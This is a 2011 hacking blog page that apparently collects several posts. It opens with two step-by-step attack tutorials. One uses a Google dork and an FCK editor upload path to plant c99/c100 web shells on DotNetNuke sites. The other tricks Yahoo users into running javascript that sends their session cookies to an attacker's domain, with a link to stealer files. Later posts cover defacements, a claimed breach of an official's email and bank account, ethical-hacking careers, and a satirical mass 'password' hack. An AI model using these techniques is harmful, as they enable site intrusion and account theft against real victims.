Wednesday, 6 April 2011

Protal Hacking (DNN) - Website Hacking Technique Explaind !

Hello frnds, One more hacking method called "Portal Hacking (DNN)". This method also uses google search to find hackable sites.. Now you can imagine that how much google.com is important for Hackers also...

 










 Lets start the tutorials...
 


Step 2:Now enter this dork
                                           :inurl:/tabid/36/language/en-US/Default.aspx












this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3: 
you will find many sites, Select the site which you are comfortable with.

Step 4: 
For example take this site.
Example:     http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace
/Home/tabid/36/Language/en-US/Default.aspx
  
with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 
 

Step 6:You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8:Now replace the URL in the address bar with a Simple Script 

                        javascript:__doPostBack('ctlURL$cmdUpload','')
 
Step 9:You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 etc etc 

Hope all of like my articles...  Please comment !

Hack Yahoo Accounts with Session ID's or Session Cookies !

Hello Friends, This is an Guest post By Mr. Aneesh M. Makker admin of http://www.explorehacking.com/ on "Hack Yahoo accounts with Session IDs or session cookies".



What are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Thank you for reading this Article.
Rohit

Bihar Cricket Council website hacked by ZCompany Hacking Crew !

Bihar Cricket Council website hacked by ZCompany Hacking Crew !



Statement given by Hacker "- Recently a indian hacker called Angel aka 4d0r4bl3 defaced a pakistani government site sending a warning message to ZHC & TeaMp0isoN, our reply:
- We Deface for a reason, our reason for defacing is to raise awareness of issues in the world, our main focus is palestine & kashmir - we have no time for silly little "cyber-wars" go ask some PCA kids to play with you -".

Hacked site Link : http://biharcricket.com/
Mirror Link http://zone-h.com/mirror/id/13033297

Email & Bank Account of DIRECTOR,Indian Ministry of Communications & IT Hacked by Zcompany Hacking Crew !


Last Night (24 March,2011) we (The Hacker News) got an email from id of Amar Singh Meena,DIRECTOR (T)TEC, Ministry of Communications & IT. But this email was sent by a Hacker from his email id having codename "Hard Hunter" from Zcompany Hacking Crew. Zcompany Hacking Crew or ZHC Hack for reason to raise awareness of the issues in the world with a main focus on Kashmir & Palestine. Now they have access to Personal Email ID of Mr. Amar Singh Meena and also have his ICICI Bank details. 


Even Today 1389 Indian websites defaced/Hacked By ZCompany Hacking Crew & TeaMp0isoN : Read Here


How ZHC hack into Email :
Hard Hunter [ZHC] had a access to a Online Store where he found email of Amar Singh, they hack logged into his email and then went for his ICICI details.


Message From ZHC :
As in above image, The email send us (The Hacker News) from hacked email , they said that :


Hello Hackers News,
This is not A.S meena himself but its me Hard Hunter from Zcompany
Hacking Crew.We want to show this that we've successfully hacked into
the Director's email and got his bank account details and etc.We're
going to show those documents soon

Regards
Hard Hunter[ZHC]



They Have told that, they will public all his Bank and Email data details soon !


Proof Of Hack :
Here some Screenshots send us By ZHC as the Proof of Hack :
1.) Reliance share hold Email



 









2.) Email Related to National Securities Depository Limited









3.) ICICI Bank Account Details / Account Successfully Accessed


India's CBI plans to send teams to US, Europe to trace hackers !


Against the backdrop of the attack on its website by "Pakistan Cyber Army", the CBI is considering to send its team to the US and Europe to trace hackers involved in the defacement.

Sources said the agency officials have pin-pointed three Internet Protocol (IP) address -- a unique numerical label borne by each computer in a network that use worldwide web for communications -- two originated from Seattle, Pennsylvania in the US and other in Daugavpils, Latvia in northern Europe.

They said the agency has moved a local court here seeking permission to access authorities in the US and Latvia for collecting information on the IP addresses.

The CBI had on December 4 last year registered a case against unknown persons of "Pakistani Cyber Army" for hacking and defacement of its website under various Sections of Information Technology Act.

Indian needs Hacker in 2011 !



When other 12-year-olds spend the day playing or watching films, Shantanu Gowde has been in the news for spending time with IT professionals twice his age. India's youngest hacker, Shantanu was just three years old when he used the computer to make PowerPoint presentations, slideshows and birthday cards for friends. Now, he has 'ethically' hacked into websites of over 50 corporate houses and individuals and gives regular security tips to a Mumbai IT firm.

Worried over increasing piracy and leaks of movie trailers and posters, film-makers and production companies have turned to experts who can take down the offending websites. Girish Kumar, managing director of Aiplex Software has provided online anti-piracy solutions to over 50 Bollywood films including My Name is Khan, Housefull and Peepli Live and big banners like UTV, Eros and Yashraj Films. He says, "Most production houses are aware of the fact that online piracy is a real threat. Often, copyright notices do the trick. With sites that offer 'torrents' of movie downloads, we flood it with fake links or direct the website address away from the actual page."

In 2010, hackers made news several times, for instance, when Future Group's flagship ecommerce portal stopped functioning for two days after an attack, investigation agency CBI's portal was hacked by programmers who identified themselves as "Cyber Pakistani army". Rajya Sabha member and industrialist Vijay Mallya's personal website too was allegedly broken into by Pakistani hackers. The US Army website also stopped functioning for a day after being hacked. Social messaging service Twitter also shutdown for hours, while Facebook experienced intermittent access problems after such attacks.

Explains security evangelist Rohit Srivastava, "A hacker's job is to help the company find and plug loopholes in the system. Companies hire us to build a team of inhouse security which develops software and systems that are hacking-proof." Rohit is the founder of Hack-Club, a first for hackers in India, to increase security awareness among the general public.

As the unconventional skill gains credibility, more and more people are opting for it as a career. Says Sheetal Kapoor, who has done a post-graduate diploma course in ethical hacking and cyber security, "I have worked as a cyber security consultant with MNCs and on certain government projects. Companies are increasingly concerned about the security of their websites."

Over the years, hackers have perfected innovative ways to crack into protections built into a computer operating system. Wellknown hacker Ankit Fadia began by experimenting with his home computer at the age of 12 and in two years, wrote his first book on the subject. Ankit claims he was consulted by an intelligence agency for breaking an encrypted message that was believed to have been sent by one of Osama Bin Laden's men. Today, he is a security consultant for several MNCs and even hosts a show on a popular youth channel. He says, "I was attracted to the power of being able to do something most people could not, that's how my love for hacking began. Now, I have been able to convert my hobby into a profession as well."

Ankit adds, "As the reach of the Internet spreads, the challenges that organizations, whether government, semigovernment or private, face is enormous. New vulnerabilities are discovered daily and can expose the information network to unwanted elements."

A much abused word, "hacker" originally meant "clever programmer ". Hackers stunned the world when WikiLeaks supporters unitedly brought down the Swedish government's website along with those of Paypal and Master - Card. In fact, the world - wide web was discovered by hacker Timothy J. Berners-Lee, who was caught hacking and banned from using his university's computer. Hacker Steven Gary Wozniak invented the Apple I, one of the first microcomputers. He and Steve Jobs assembled the first prototypes in Job's garage. The software was coded mostly by Wozniak.

Among the country's best ethical hackers, Sunny Vaghela e-mail account was hacked when he was 16. And the curiosity to catch the hacker motivated him to become a professional himself. ''I hacked into major government and private websites and later sent them a note, suggesting possible solutions,'' he says.

Sunny, whose technical advice was accepted and adopted by Google's social networking website Orkut, when he pointed out loopholes to its administrators, explains, "A professional hacker can earn more than a regular IT professional. In the last six months, nearly 4.5 lakh sites were hacked, and last year, around 2.5 lakhs were hacked. Antivirus and firewalls are not enough to protect your data." Dinesh Pillai, CEO Mahindra SSG and his team of "ethical hackers" believe that every company needs trained hands to implement security risk management systems. "The demand for this skill is going to go up as companies realize the need to protect business and brand value."

Hackers Changes Millions of Passwords to "password" !

 Hackers Changes Millions of Passwords to "password" !

Passwords from over 3,000,000 user accounts were apparently set to "password" late last night in a wide-spread hack that affected hundreds of news, retail and Web 2.0 sites. Most affected users are completely unaware of the attack.



According to current statistics, 62% of affected users would not notice such a change as their password was already "password".


Several sites have reported that they are taking steps to protect compromised accounts. In addition, many sites are creating a new rule to ban using the word "password" as a password.


Users are reacting fiercely to the hack but even more so to the ban many sites are putting on one of the world's most popular passwords. Online riots are to be expected.


The hacker group named "Obvious" has claimed credit for last evening's attack. Thousands of hacked Twitter and Facebook accounts posted the message "We are all Obvious! Don't Expect Us".


A 1.9 GB file containing more than 3,000,000 user names — and one password — is now available for download as a torrent file via The Pirate Bay.


To avoid problems like this in the future, we are recommending users to change their password everywhere to "password1", which is obviously more secure.

MumbaiITPro User Group Hacked by TriCk [TeaMp0isoN]


MumbaiITPro User Group Hacked by TriCk [TeaMp0isoN]

MumbaiITPro User Group is an online technical community initiative for the IT Professionals. They are supported by Global IT Community Association (GITCA) and Microsoft Corporation.


Hacked site : http://mumbaiitpro.org/
Mirror : http://mirror.sec-t.net/defacements/?id=7039